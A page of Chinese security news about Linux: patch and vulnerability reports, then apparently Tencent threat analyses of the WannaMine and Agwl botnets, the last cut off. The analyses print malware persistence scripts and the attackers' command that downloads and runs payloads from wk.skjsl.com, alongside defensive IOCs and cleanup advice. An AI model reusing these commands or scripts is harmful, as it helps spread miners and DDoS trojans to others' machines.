标签: Linux

开发者为 Linux 添加了一系列 RISC-V UEFI 支持补丁

今年早些时候 Linux 中的 UEFI 代码已经进行过清理,随后一系列 RISC-V UEFI 支持的早期补丁被提出,形成了更为全面的补丁集,用于在 Linux 下启用 RISC-V 的 UEFI 支持。近日则又有开发者提交了一系列补丁,解决了大量问题的同时为 Linux 下支持 RISC-V UEFI 新增了一些新的能力。 开发者 Atish Patra 来自西部数据,他在上周四提交了 11 个补丁,根据他的介绍,补丁 1-6 是准备性修补程序,可修复一些通用的 efi 和 riscv 问题;补丁 7-9 增加了对 RISC-V 的 efi stub 支持,并已在四月份提交审核;补丁 10 重命名了 arm-init,以便可以在不同的代码中使用该基础;补丁 11 则为 RISC-V 添加了运行时服务。 总结起来,这一系列补丁的主要贡献在于: 添加了完整的 ioremap 支持。 添加了 efi 运行时服务支持。 修复了 mm 问题。 目前补丁已在 Qemu 上使用 U-Boot 中的 bootefi 命令进行了验证,在 RISC-V 32 位与 RISC-V 64 位上都通过测试。不过 RISC-V 上 EDK2 代码的某些问题仍在解决中,主要是 SPI 与网络驱动相关的问题。 这一系列补丁打在 Linux 内核 5.8-rc2 上,目前还处于 PR 状态,等待代码审核,如果解决了相关问题,并且最终被接受,那么在 Linux 5.8 发布的时候应该能够看到。     (稿源:开源中国,封面源自网络。)

Linux 再次严辞拒绝 Intel CPU 漏洞补丁

近日,Linux 内核项目负责人 Linus Torvalds 拒绝了 AWS 工程师提交的一个补丁,该补丁的目的是减轻 Intel CPU 遭遇一种新型窥探攻击而导致数据泄露的风险。 这种新型攻击名为“探听辅助 L1 数据采样攻击”,简称 Snoop (CVE-2020-0550)。今年 3 月,来自 AWS 的软件工程师 Pawel Wieczorkiewicz 率先发现了 Intel 处理器的这一漏洞,它可能会泄露 CPU 内部存储器或缓存中的数据,涉及 CPU 包括 Intel 旗下流行的 Xeon 和 Core 系列处理器。Pawel 迅速向 Intel 报告了此问题,随后该漏洞被 Intel 定位为中等严重性漏洞。 新的 Snoop 攻击利用了 Intel CPU 多级缓存、缓存一致性和总线监听等特性,通过位于 CPU 内核中的一级数据缓存(L1D),通过“总线监听”(bus snooping)功能 —— 在 L1D 中修改数据时发生的缓存更新操作,将数据从 CPU 中泄漏出来。 以近代 CPU 的视角来说,计算机通常会采用三级缓存的设计来提高 CPU 的运行效率。三级缓存包括 L1 一级缓存、L2 二级缓存、L3 三级缓存,这些缓存都集成在 CPU 内,它们的作用是作为 CPU 与主内存之间的高速数据缓冲区。其中 L1 最靠近 CPU 核心;L2其次;L3再次。运行速度方面:L1最快、L2次快、L3最慢;容量大小方面:L1最小、L2较大、L3最大。在执行一项任务时,CPU 会先在最快的 L1 中寻找需要的数据,找不到再去找次快的 L2,还找不到再去找 L3,L3 都没有才去内存找。 而一级缓存其实还分为一级数据缓存(Data Cache,D-Cache,L1D)和一级指令缓存(Instruction Cache,I-Cache,L1I),分别用于存放数据及执行数据的指令解码,两者可同时被CPU 访问,减少了 CPU 多核心、多线程争用缓存造成的冲突,提高了处理器的性能。一般CPU 的 L1I 和 L1D 具备相同的容量,例如 I7-8700K 的 L1 即为 32KB+32KB。Snoop 攻击就是一种窃取 L1D 缓存中数据的攻击手段。 不过 Intel 的用户也不用惊慌,据 Intel 官方解释说,这种新攻击「很难实施」,并且不会泄露大量数据,毕竟 L1D 缓存中的数据非常有限,并且只有在任务运行时调用数据的短暂时间内才会存在。“我们不认为 Snoop 攻击在可信赖的操作系统环境下是一种实用的攻击方法,因为要利用这一漏洞需要同时满足很多苛刻的条件,比如攻击的时间要正好与用户打开程序的时间吻合,且程序调用的数据正好是攻击者想要窃取的数据。” 该漏洞披露之后,另一位来自 AWS 的软件工程师 Balbir Singh 为 Linux 内核提交了一个补丁,该补丁使 Linux 的应用程序能够选择在任务切换时自动刷新 L1D 的缓存,以降低 Linux 系统遭遇 Snoop 攻击的风险。 Singh 在 4 月份曾解释说:“这个补丁可以防止他们的数据在任务结束后被监听或通过旁道泄露。”他原本打算该补丁可以随 Linux 内核的 5.8 版一起发布。“如果硬件支持,该特性将允许基于可选加入的应用程序调用 prctl() 功能来刷新任务关闭后残留在 CPU 中的 L1D 缓存。” 但是,知名技术测试网站 Phoronix 指出,在任务结束后刷新 L1D 缓存会导致 CPU 的性能降低。Linux 内核项目负责人 Linus Torvalds 认为,这将导致使用该补丁的所有 Linux 用户(无论是否采用 Intel CPU)的 CPU 性能降低,严正拒绝了该补丁,同时还一如既往地说起了骚话。 Torvalds 在回复该提交的邮件列表中写道:“因为在我看来,这基本上是将缓存刷新指令导出到用户空间,并为进程提供了一种方式,可以说让与这事情无关的其他人也慢了下来。” “换言之,据我所知,这就是疯狂的 Intel 发布了有缺陷的 CPU,它给虚拟化代码带来了问题(我对此并不太在意),但现在要因为它的问题影响到本来就没有这些问题的 Linux 用户,这是完全没有意义的。” 在一番非常 Linus 式的回复下,Linus 对虚拟化的引用其实也是针对 AWS 的,AWS 和其他云服务提供商一样,销售的虚拟 cpu 通常启用了同步多线程(simultaneous multithreading,SMT)功能。Linus 接着指出,“在启用 SMT 的情况下,任务调度是分布式进行的,所以说,在任务结束与新任务开始之间刷新 L1D 缓存是非常愚蠢的。” 值得一提的是,AWS 的首席工程师 Benjamin Herrenschmidt 在与 Red Hat Linux 内核贡献者 Ingo Molnar 的讨论中也为该补丁的争论添加了一些背景。Herrenschmidt 承认这个补丁对 SMT 来说毫无意义,但他敦促 Linux 内核开发人员不要“把婴儿和洗澡水一起扔掉”,并反驳了这个补丁是因为 AWS 想把超线程作为虚拟 cpu 出售的说法。Herrenschmidt 说,“这些补丁并不是要解决运行 SMT 的客户 VM 内部出现的问题,也不是要保护 VM 免受同一系统上其他 VM 的攻击。” 事实上,Linus 已经不是第一次严辞拒绝与 Intel CPU 有关的补丁。2018 年初,为了修补 Spectre 漏洞,Intel 工程师提供了一个间接分支限制推测(indirect branch restricted speculation, IBRS)功能的补丁,Linus 当时就在邮件列表中公开指出 IBRS 会造成系统性能大幅降低。 而就在上个月,Linus 对自己的私人电脑进行了升级,同时公开了自己最新的主力机器配置,他把自己的 CPU 换成了 AMD Ryzen Threadripper ,放弃使用了 15 年的 Intel 处理器。     (稿源:开源中国,封面源自网络。)

科学家发现 26 个 USB 漏洞:Linux 18个 Windows 4 个

近日多名学术界人士表示,在Linux、macOS、Windows和FreeBSD等操作系统所使用的USB驱动堆栈中发现了26个新的漏洞。这支科研团队由普渡大学的Hui Peng、瑞士联邦理工学院洛桑分校的Mathias Payer带领,所有漏洞都是通过他们创建的新工具USBFuzz发现的。 这类工具被团队成员称之为“模糊器”(fuzzer)。模糊器是多款应用程序的集合,能够帮助安全研究人员将大量无效、意外或者随机数据输入其他应用程序。然后,安全研究人员分析被测试软件的行为方式,以发现新的bug,其中一些可能被恶意利用。 为了测试USB驱动,Peng和Payer共同开发了USBFuzz,这是一种专门用于测试现代操作系统的USB驱动堆栈的新型模糊器。研究人员表示:“其核心部分,USBFuzz使用软件仿真的USB设备来向驱动程序提供随机的设备数据(当他们执行IO操作时)。” 团队表示:“由于仿真的USB设备是在设备层面工作的,因此将其移植到其他平台上是很直接的。”这使得研究团队不仅可以在Linux上测试USBFuzz,还可以在其他操作系统上进行测试。 研究人员表示,他们在以下平台上测试了USBFuzz。 ● Linux内核的9个最新版本:v4.14.81、v4.15、v4.16、v4.17、v4.18.19、v4.19、v4.19、v4.19.1、v4.19.2和v4.20-rc2(评估时的最新版本)。 ● FreeBSD 12 (最新版本) ● MacOS 10.15 Catalina(最新版本) ● Windows(8和10版本,并安装了最新的安全更新) 在测试之后,研究团队表示,在USBFuzz的帮助下,他们一共发现了26个新的bug。 研究人员在FreeBSD中发现了一个bug,在MacOS中发现了三个(两个导致计划外重启,一个导致系统冻结),在Windows 8和Windows 10中发现了四个(导致死亡蓝屏)。 最严重的是针对Linux的,总共有18个。其中16个是针对Linux各个子系统(USB core, USB sound和net-work)的高危内存漏洞,此外还有1个是针对Linux的USB host主控驱动,还有一个是USB摄像头驱动。 Peng和Payer表示,他们向Linux内核团队报告了这些bug,并提出了补丁建议,以减轻 “内核开发人员在修复报告的漏洞时的负担”。 研究团队表示,在这18个Linux漏洞中,有11个自去年首次报告以来,他们收到了补丁。在这11个bug中,有10个还收到了CVE,这是一个被分配给重大安全漏洞的唯一代码。 相关论文《USBFuzz: A Framework for Fuzzing USB Drivers by Device Emulation》,可以访问这里 和 这里。     (稿源:cnBeta,封面源自网络。)

Canonical 为 Ubuntu 发布 Linux 内核安全更新,缓解一系列 CPU 漏洞

Canonical 为其所有受支持的 Ubuntu Linux 版本发布了一批新的 Linux 内核安全更新,以解决最新的 Intel CPU 漏洞以及其他重要缺陷。 正如前几天所宣布的那样,Canonical 迅速响应了影响英特尔 CPU 微体系结构的最新安全漏洞,因此他们现在发布了 Linux 内核更新来缓解这些漏洞。包括有 CVE-2019-11135,CVE-2018-12207,CVE-2019-0154 和 CVE-2019-0155,这些漏洞可能允许本地攻击者公开敏感信息或可能提升特权或导致拒绝服务。 而除了解决影响英特尔 CPU 的这些安全问题之外,新的 Linux内核安全更新还解决了在 shiftfs 中发现的,可能允许本地攻击者执行任意代码,导致服务被拒绝(系统崩溃)或绕过DAC权限的三个漏洞(CVE-2019-15791,CVE-2019-15792和CVE-2019-15793)。 同时,此次更新还修复了在Linux内核的802.11 Wi-Fi配置接口中发现的缓冲区溢出(CVE-2019-16746),以及在Realtek Wi-Fi驱动程序中发现的另一个缓冲区溢出(CVE-2019-17666)。 另外,该安全更新还修复了在Linux内核的Appletalk,AX25,NFC,ISDN和IEEE 802.15.4低速率无线网络协议实现中发现的,仅影响Ubuntu 19.04,Ubuntu 18.04 LTS,Ubuntu 16.04 LTS系统的几个漏洞,即CVE-2019-17052,CVE-2019-17053,CVE-2019-17054,CVE-2019-17055和CVE-2019 -17056,所有这些漏洞都可能允许本地攻击者创建原始套接字。 以及修复了在 Linux内核的Atheros AR6004 USB Wi-Fi设备驱动程序中发现的漏洞(CVE-2019-15098),和在Binder IPC 驱动程序实现中发现的 CVE-2019-2215。 Canonical 敦促用户再次将其系统更新为上述新的 Linux 内核版本,以解决问题。 参考消息:https://news.softpedia.com   (稿源:开源中国,封面源自网络。)

存在至少 4 年的 Linux 漏洞被发现:可通过 WiFi 攻击目标计算机

一位安全研究人员表示,由于Linux中存在的严重安全漏洞能导致使用WiFi信号的附近设备崩溃,或者完全被黑客掌控。名叫 Nico Waisman 的安全研究人员发推文称,该漏洞位于RTLWIFI驱动程序中,而该驱动程序用于在Linux设备上支持Realtek WiFi芯片。 据悉当具有Realtek Wi-Fi芯片的计算机在恶意设备的无线电范围内时,该漏洞将会在Linux内核中触发缓冲区溢出问题。该漏洞不仅可以引起操作系统崩溃,而且还允许黑客完全掌控计算机。该缺陷可追溯到2013年发布的Linux内核的3.10.1版本。 Github的首席安全工程师Nico Waisman表示:“这个漏洞非常严重,只要您使用Realtek(RTLWIFI)驱动程序,此漏洞就可以通过Linux内核上的Wi-Fi远程触发溢出。”漏洞跟踪为CVE-2019-17666。 Linux开发人员在星期三提出了一个修复程序,很可能在未来几天或几周内将其合并到OS内核中。只有在此之后,该修补程序才能进入各种Linux发行版。 Waisman表示目前还没有设计出一种概念验证攻击,利用该漏洞在受影响的设备上执行恶意代码。不过他表示:“我仍在试图探索,这肯定会……花一些时间(当然,这或许是不可能的)。在表面上,[this]是应该被利用的溢出。最坏的情况是,[this]是拒绝服务;最好的情况是,您得到了shell。” 在该漏洞公开之后,该研究专家没有继续在推特上研究这个漏洞。   (稿源:cnBeta,封面源自网络。)

Linux 曝出 Sudo 提权漏洞 受限用户亦可运行 root 命令

作为 Linux 中最常使用的重要实用程序之一,Sudo 几乎安装在每一款 UNIX 和 Linux 发行版上,以便用户调用和实施核心命令。然而近期曝出的一个提权漏洞,却直指 sudo 的一个安全策略隐患 —— 即便配置中明确不允许 root 用户访问,该漏洞仍可允许恶意用户或程序,在目标 Linux 系统上以 root 用户身份执行任意命令。 (题图 via Hacker News) 据悉,Sudo 特指“超级用户”。作为一个系统命令,其允许用户以特殊权限来运行程序或命令,而无需切换使用环境(通常以 root 用户身份运行命令)。 默认情况下,在大多数 Linux 发行版中(如屏幕快照所示),/ etc / sudoers 的 RunAs 规范文件中的 ALL 关键字,允许 admin 或 sudo 分组中的所有用户,以系统上任何有效用户的身份运行任何命令。 然而由于特权分离是 Linux 中最基本的安全范例之一,因此管理员可以配置 sudoers 文件,来定义哪些用户可以运行哪些命令。 这样一来,基板限制了用户以 root 身份运行特定或任何命令,该漏洞也可允许用户绕过此安全策略,并完全控制系统。 Sudo 开发者称: “只要 Runas 规范明确禁止 root 访问、首先列出 ALL 关键字,具有足够 sudo 权限的用户就可以使用它来以 root 身份运行命令。” 据悉,该漏洞由苹果信息安全部门的 Joe Vennix 追踪发现(CVE-2019-14287)。且想要利用这个 bug,只需 Sudo User ID -1 或 4294967295 。 这是因为将用户 ID 转换为用户名的函数,会将 -1(或无效等效的 4294967295)误认为 0,而这正好是 root 用户 User ID 。 此外,由于通过 -u 选项指定的 User ID 在密码数据库中不存在,因此不会运行任何 PAM 会话模块。 综上所述,该漏洞影响最新版本 1.8.28 之前的所有 Sudo 版本。庆幸的是,几个小时前,各大 Linux 发行版都已经在向用户推送新版本了。   (稿源:开源中国,封面源自网络。)

WannaMine 挖矿木马再活跃,14 万台 linux 系统受攻击,广东省为重灾区

感谢腾讯御见威胁情报中心来稿! 原文:WannaMine挖矿木马再活跃,14万台linux系统受攻击,广东省为重灾区   一、背景 腾讯安全专家在为某企业客户进行例行安全巡检过程中,发现客户部署的腾讯御界高级威胁检测系统出现了SSH服务失陷感知信息。 在征得客户同意后对客户机器进行远程取证,并结合御界的关键日志进行分析,我们发现这是一起针对SSH服务器弱口令爆破攻击事件,由于发现及时,工程师及时协助客户进行隔离及杀毒,并未造成损失。 腾讯安全御见威胁情报中心展开事件调查,结果发现,这是由大型挖矿僵尸网络WannaMine发起的攻击事件:攻击者利用SSH弱口令爆破成功后会植入shell后门以及brootkit后门程序,并通过SSH在内网横向传播,受害机器接收远程指令安装(包括但不限于)挖矿木马、DDoS攻击模块。 SSH代表安全外壳(Secure Shell),它现在是通过互联网访问网络设备和服务器的主要协议之一。SSH主要用在所有流行的操作系统上,比如Unix、Solaris、Red-Hat Linux、CentOS和Ubuntu等。SSH默认情况使用端口号22,我们通过zoomeye查找开放22端口的设备,发现全球有超过1亿台设备开放了该端口,这意味着超过1亿台设备有被爆破攻击的可能。(参考链接:https://www.zoomeye.org/searchResult?q=port%3A22) 根据腾讯安全御见威胁情报中心的监测数据,WannaMine自2019年6月开始在国内呈现新的快速增长趋势,目前已影响近14万台设备。 病毒感染地区分布前三名分别为:广东(20.3%)、江苏(7.7%)、浙江(7%)。 WannaMine病毒受害者分布 受WannaMine病毒影响的主要行业为工业企业(34.11%),其次为互联网企业(10.85%)和教育行业(10.08%)。 WannaMine挖矿木马影响的主要行业 二、详细分析 分析发现,此次攻击事件中WannaMine开始将攻击目标转向Linux系统,其行为主要具有以下特点: 1、会获取被感染机器的SSH连接记录,从而攻击该机器登录过的所有远程服务器,以达到横向传播的目的; 2、检测中招机器上的“安全狗”、“安骑士”、“云锁”、“悬镜卫士”等12种服务器防护软件,针对每一款软件进行退出及删除; 3、将守护脚本代码添加至Linux启动项、定时任务,以达到持久化;最后清除挖矿竞争对手,开启挖矿,并尝试利用Linux内核提权漏洞CVE-2016-5195获取系统Root权限; 4、植入Linux平台DDoS木马“BillGates”,该木马伪装成Linux系统工具“ps”,“lsof”和”netstat”等进行隐藏,具有远程shell、作为客户端或服务器运行的功能。“BillGates”接收远程指令,对目标进行多种类型的DDoS攻击。 WannaMine攻击Linux系统 Shell 在通过漏洞攻击、爆破攻击进入Linux系统后,病毒植入“Shell”脚本。脚本首先进行变量声明,指定后续需要用到的网络地址,文件路径等信息。 指定木马远程地址和目录、以及文件hash: temp_remote_host: 远程地址 sodd_info_arr: DDoS木马 tiktoor_info_arr: brootkit后门 pxe_info_arr: CVE-2016-5195内核提权 指定木马执行路径、进程名及相关参数: 下载文件保存目录:DownloadPath=”/usr/lib/…” Shell进程名:ShellProceName=”diskmanagerd” DDoS木马进程名:soddProceName=”kacpi_notify” Shell进程权限:shell_privilege=1 系统类型:OsType=1 校验方法:verify_method=”md5sum” Shell参数:ShellArg=$1 当前版本:Ver=1.0 对抗杀软 通过ls -l /etc/init.d/$servicename检测以下防护服务: Safedog:安全狗 aegis:安骑士 yunsuo:云锁 clamd:ClamAV avast:Avast avgd:AVG cmdavd:COMODO Antivirus cmdmgd:COMODO Antivirus drweb-configd:Dr.Web drweb-spider-kmod:Dr.Web esets:ESET NOD32 Antivirus xmirrord:悬镜服务器卫士 然后针对每一款防护软件进行清理,包括停止服务、杀死进程、删除文件、卸载软件等操作。 function BasicInit(){}执行基础的初始化。 使用ping命令检查remote_host中的第一个地址是否能连接,如果不能则使用第二个; 通过查看$UID、$EUID的值来确定当前的权限,高权限则设置下载目录为”/home/$USER/…”,低权限设置为”/usr/lib/…”; 检查当前是否具有md5校验功能;检查当前系统属于CentOS/Ubantu/Debian中的哪一种,默认为CentOS。 内核提权 function RunInBack(){}检查shell是否使用/sbin/init运行,如果不是则将脚本移动到以前具有写入权限(Rwx)的文件夹,其名称为“diskmanagerd”(名称在$ShellProceName名称变量中指定),然后将脚本尝试使用nohup实用程序重新运行,或在未安装nohup时仅在后台运行。 function GetRootAccess(){}利用漏洞CVE-2016-5195获取系统Root权限。 参考链接:https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails CVE-2016-5195(脏牛漏洞)是因为Linux内核的内存子系统在处理写入时复制(copy-on-write, COW)时产生了竞争条件(race condition),攻击者利用此漏洞对只读内存映射进行写访问,从而可获得Linux设备的root权限。 清除挖矿竞品 function WorkProc(){}检测并结束挖矿相关的进程。 持久化攻击 function SetStartup(){}中分别添加守护程序到Linux启动项目录、定时任务,以达到反复执行shell的目的。 守护脚本1: guarderText=”#!/bin/sh # chkconfig: 12345 90 90 # description: irqbalence ### BEGIN INIT INFO # Provides:     irqbalence # Required-Start: # Required-Stop: # Default-Start:    1 2 3 4 5 # Default-Stop: # Short-Description:    irqbalence ### END INIT INFO case \$1 in start)     /usr/bin/irqbalence     ;; stop)     ;; *)     /usr/bin/irqbalence     ;; esac” 将guarderText内容写入启动目录/etc/rc.d/init.d目录下,从而在启动时执行。 守护脚本2: guarderText2=”#!/bin/sh PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin for i in \`cat /proc/net/dev|grep :|awk -F: {‘print \$1’}\`; do ifconfig \$i up& done if [ ! -f \”$DownloadPath/$ShellProceName\” ]; then     \cp -rf /lib/libterminfo.so $DownloadPath/httpdinfo fi test=0 for i in /proc/* do     if [ -d \”\$i\” ] && [ \”\$i\” != \”/proc/\$\$\” ];then         if [ -f \”\$i/exe\” ]; then             temp=\`ls -l \$i | grep exe | grep /bin/bash\`             if [ \”\$temp\” != \”\” ]; then                 temp=\`cat \$i/cmdline\`                 result=\$(echo \”\$temp\” | grep \”$ShellProceName\”)                 if [ \”\$result\” != \”\” ]; then                     test=1                     break                 fi             fi         fi     fi done if [ \”\$test\” = 0 ]; then     (exec $DownloadPath/httpdinfo &> /dev/null &) fi” 将guarderText2写入etc/cron.hourly/gcc4lef.sh,并安装为crontab定时任务运行 brootkit后门 function rootkit(){}安装brootkit后门(github: https://github.com/cloudsec/brootkit),该后门具有具有盗取root用户密码、隐藏文件和目录、隐藏进程、隐藏网络连接、反连后门、多线程端口扫描、HTTP下载、多线程SSH爆破等功能。 横向移动 function Dandelion(){}从各种来源(用户历史记录)收集有关当前用户之前通过SSH连接的所有远程服务器信息,尝试连接到这些主机并感染它们,以便将自身传播到更多的系统。 DDoS木马 function CheckUpdate(){}检查木马最新版本,并从服务器下载更新 function Guard(){}中下载DDoS病毒”BillGates”。 依次使用4中下载方法尝试下载(“wget” “curl” “python” “tcp”)。 下载完成后后使用md5sum计算文件md5并进行校验,验证md5值是否为6a971a24a418ce99e9a0cd65ba14078d/4e117357b8a5bf51aaba6e939cace26b。 BillGates(作者疑似比尔盖兹的粉丝) shell下载的文件为功能复杂DDoS木马BillGates,其得名于其在变量函数的命名中,大量使用“Gates”和“Bill”。此外,木马还具有伪装成Linux系统工具’ps’,’lsof’和’netstat’等进行隐藏自身、远程shell、作为客户端或服务器运行等特点。 木马早期大规模扫描和利用漏洞感染Elasticsearch服务器(ElasticSearch是一个基于Lucene的搜索服务器,是最受欢迎的企业搜索引擎)从而组成强大的僵尸网络。 木马首先建立一个包含文件名和路径的全局变量“监视”文件。监视文件代表初步安装的BillGates处于运行状态下。接下来通过CSysTool::CheckGatesType来确定当前处于哪种运行状态下,判断返回的全局变量g_iGatesType标识0至3共四种状态: 0代表当前进程的映像符合监控文件名和路径 1代表当前进程的映像不符合监控文件名和路径,并且不属于其他任何类型 2代表当前进程的映像符合/usr/bin/ 3代表当前进程的映像符合下列系统工具之一 /bin/netstat /bin/lsof /bin/ps /bin/ss /usr/bin/netstat /usr/bin/lsof /usr/bin/ps /usr/bin/ss /usr/sbin/netstat /usr/sbin/lsof /usr/sbin/ps /usr/sbin/ss 匹配到每个标识后都以不同的目的运行,这样使得BillGates作为单个实体可以运作四种不同的模式,执行多个独特的功能,从而其成为一个复杂的的多功能木马。 模式0 BillGates作为感染监控器,通过调用MainMonitor开始。在这种模式下的任务是不断监视活动进程列表以确定是否生成了由模式1(称为Host模式)产生的进程正在运行。 模式1 BillGates的Host模式。当main函数中调用MainBeikong开始执行。Host模式的初始化阶段完成后,MainBeikong通过调用MainProcess结束,MainProcess是BillGates在Host或Backdoor模式下运行时的核心功能。MainProcess首先初始化五个全局对象: Host或backdoor模式下的BillGates支持7种不同的管理控制命令: 其中DDoS攻击类型如下: 模式2 Backdoor模式。main函数中调用MainBackdoor进入该模式。使用BillGates文件替换Linux系统二进制文件,然后MainBackdoor调用MainProcess,在这之后执行代码与Host模式的行为相同。 模式3 公共设施。该模式通过调用MainSystool 开始,BillGates作为Linux系统二进制文件的代理运行,并从系统工具的输出中删除自己的痕迹。 三、总结 WannaMine攻击代码呈现高度系统化、定制化的特点,从首次出现之后,其载荷托管IP地址会在没一次重要更新之后进行切换。而观察历史托管IP与IP解析到的域名可以发现,跨时期、跨版本的攻击代码又存在使用相同的托管域名(标红域名)的情况,因此推测该病毒团伙存在在向其他团伙提供攻击武器的可能。 从攻击对象与手法上来看,WannaMine不断拓宽其攻击覆盖面,从最初的利用“永恒之蓝”漏洞、Powershell攻击Windows系统,到后来利用各类Web漏洞(Weblogic、PHPMyAdmin、Drupal)攻击Windows上搭建的服务器,到最后通过MsSQL爆破攻击SQL服务器,以及SSH爆破攻击Linux服务器。 在木马类型上,开始以植入挖矿和远控类型木马为主,后来逐渐加入DDoS木马(包括Windows平台和Linux平台),其目标在于组建庞大的挖矿僵尸网络以及DDoS僵尸网络,使该病毒团伙具有不断更新、内网横向移动、持久化获利的能力。 四、安全建议 1、及时为系统和应用软件打补丁,关闭不必要的端口和服务; 2、使用高强度的系统登陆密码、SSH登陆密码、MsSQL数据库密码等; 3、安装安全软件并保持安全软件正常开启,本案例说明,Linux系统被病毒入侵的事件越来越常见; 4、Linux服务器手动清理方案 删除启动项 /etc/rc.d/init.d/diskmanagerd /etc/rcS.d/S90diskmanagerd 删除定时任务 */3 * * * * root /etc/cron.hourly/gcc4lef.sh 删除文件 /tmp/…/brootkit.sh /tmp/…/install.sh /tmp/…/just4root /tmp/…/pxe 关闭进程 /usr/lib/diskmanagerd /home/$USER/diskmanagerd /usr/lib/kacpi_notify /home/$USER/kacpi_notify 5、修复漏洞(Dirty COW:CVE-2016-5195) 各操作系统供应商下载Linux kernel 4.8.3、Linux kernel 4.7.9和Linux kernel 4.4.26 LTS,为用户提供稳定版渠道更新。 软件开发人员可以通过 https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619 重新编译Linux修复此漏洞。 6、ssh非交互方式登录到远程服务器时,设置主机公钥确认StrictHostKeyChecking的值为ask或yes,避免历史SSH登录记录被病毒利用,形成内网扩散。 (注:StrictHostKeyChecking=no 最不安全的级别,连接server的key在本地不存在,就自动添加到文件中(默认是known_hosts)。 StrictHostKeyChecking=ask 默认的级别,如果连接和key不匹配,给出提示,并拒绝登录。 StrictHostKeyChecking=yes最安全的级别,如果连接与key不匹配,就拒绝连接,不会提示详细信息。) 7、使用腾讯御界高级威胁检测系统检测未知黑客的各种可疑攻击行为。御界高级威胁检测系统,是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。 IOCs IP 195.22.127.157 107.179.67.243 45.63.55.15 94.102.52.36 123.59.68.172 93.174.93.73 121.17.28.15 195.22.127.93 198.54.117.244 107.148.195.71 185.128.40.102 185.128.43.62 192.74.245.97 87.121.98.215 172.247.116.8 172.247.116.87 45.199.154.108 111.90.140.35 185.234.218.40 185.128.41.90 Domain node3.jhshxbv.com node.jhshxbv.com node4.jhshxbv.com node2.jhshxbv.com stafftest.spdns.eu profetestruec.net nuki-dx.com ddd.parkmap.org yp.parkmap.org demaxiya.info、 fashionbookmark.com www.windowsdefenderhost.club update.windowsdefenderhost.club d4uk.7h4uk.com update.7h4uk.com info.7h4uk.com oa.to0ls.com mail.to0ls.com auth.to0ls.com MD5 1db902385b4480a76e4527605eb9f825(Shell) 6a971a24a418ce99e9a0cd65ba14078d(BillGates) 4e117357b8a5bf51aaba6e939cace26b(BillGates) c04dceb4c769b2c8823cbf39f3055e6d(Brootkit) ad593f6a17598bdd12fd3bd0f3b2a925(Brootkit) 20788d837f33f5e735bdc99d68fc71b1(Dirtycow) d9bbb758e3831839558d80f381f9d4b1(Dirtycow) 795acc900cb55882629e7ce3f65130c4(Dirtycow) 1195ea4886acf3a857913c448af78d11(Dirtycow) 参考资料: https://www.freebuf.com/articles/web/175626.html https://mp.weixin.qq.com/s/U3sODZCmCPIfFqjQgHpa0A https://zhuanlan.zhihu.com/p/68612894 https://www.novetta.com/wp-content/uploads/2015/06/NTRG_ElasticBotnetReport_06102015.pdf https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/bill-gates-botnet-threat-advisory.pdf  

Agwl 病毒团伙对 Linux 系统的三连击:挖矿、DDoS、删库勒索

感谢腾讯御见威胁情报中心来稿! 原文:https://mp.weixin.qq.com/s/wCjKwENZajw1vA9dmdgftQ   腾讯安全御见威胁情报中心监测到“Agwl”团伙在近期的入侵行动将Linux系统纳入攻击范围。 一、背景 腾讯安全御见威胁情报中心监测到“Agwl”团伙在近期的入侵行动将Linux系统纳入攻击范围。“Agwl”团伙于2018年7月被御见威胁情报中心发现,其攻击特点为探测phpStudy搭建的网站,并针对其网站搭建时使用的默认的MySQL弱口令进行爆破登录,从而植入挖矿以及远控木马。 该团伙早期入侵后植入的都是基于Windows平台的木马,其挖矿木马部分会首选清除其他挖矿程序、阻止其他挖矿木马访问矿池、独享系统资源。而最近的更新中,我们监测发现,“Agwl”团伙增加了对Linux系统的攻击,入侵成功后加入基于Linux系统执行的bash脚本代码s667。该脚本运行后会添加自身到定时任务,并进一步下载Linux平台下的CPU挖矿木马bashf和GPU挖矿木马bashg。 然而此时攻击并没有结束,“Agwl”团伙会继续植入Linux平台的DDoS病毒lst(有国外研究者命名为“Mayday”)以及勒索蠕虫病毒Xbash。Xbash勒索病毒会从C2服务器读取攻击IP地址段,扫描这些网络中的VNC、Rsync、MySQL、MariaDB、Memcached、PostgreSQL、MongoDB和phpMyAdmin服务器进行爆破攻击,爆破登录成功后不像其他勒索病毒那样去加密数据再勒索酬金,而是直接将数据库文件删除后骗取酬金,企业一旦中招将会遭受严重损失。 “Agwl”团伙攻击流程 二、详细分析 中招主机通过phpStudy一键部署PHP环境,默认情况下包含phpinfo及phpMyAdmin并且任何人都可以访问,同时安装的MySQL默认口令为弱口令密码并且开启在外网3306端口。在未设置安全组或者安全组为放通全端口的情况下,受到攻击者对于phpStudy的针对性探测,并且暴露了其MySQL弱口令。攻击者使用MySQL弱口令登录后,在web目录下执行Shell,并在其中添加植入挖矿木马的恶意代码。 入侵后执行shell命令为: cmd.exe /c “certutil.exe -urlcache -split -f http://wk.skjsl.com:93/Down.exe &Down.exe &del Down.exe&cd /tmp &&wget http://wk.skjsl.com:93/s667 &chmod 777 s667&./s667 “Agwl”团伙对Windows平台植入的木马为Down.exe,针对Linux平台植入的是s667。 Down.exe Down.exe为自解压程序,解压后释放一个hosts文件和7个BAT文件。根据解压命令,文件被释放到C:\Windows\debug\SYSTEM 目录下,首先被执行的是start.bat Start.bat主要功能为: 创建目录C:\ProgramData\Microsoft\test并设置为隐藏,将down.bat、open.bat、skycmd.bat拷贝到该目录中并安装为计划任务反复执行,对应的计划任务名分别为“SYSTEM”、“DNS”、“skycmd”;然后从www[.]kuaishounew.com下载wget.exe作为后续下载工具;最后启动start2.bat。 Start2.bat的功能为: 利用start.bat中下载的wget.exe从微软官方下载vc_redist.x64.exe,从www[.]kuaishounew.com下载unzip.exe(后续用到的解压工具)和hook.exe,然后执行install3.bat。 (vcredist_x64.exe是微软的Visual C运行时库,安装后能够在未安装VC的电脑上运行由 Visual C++开发的64位应用,该模块被下载以保证64位木马正常运行。) Install3.bat主要用于木马的三个服务“SYSTEM”、“DNS”、“skycmd”的安装和保持。 1、服务“SYSTEM” 执行的脚本为down.bat,主要功能为下载矿机程序wrsngm.zip进行挖矿,该矿机程序为开源挖矿程序xmr-stak修改而成,github地址https[:]//github.com/fireice-uk/xmr-stak。 使用矿池:wk.skjsl.com:3333 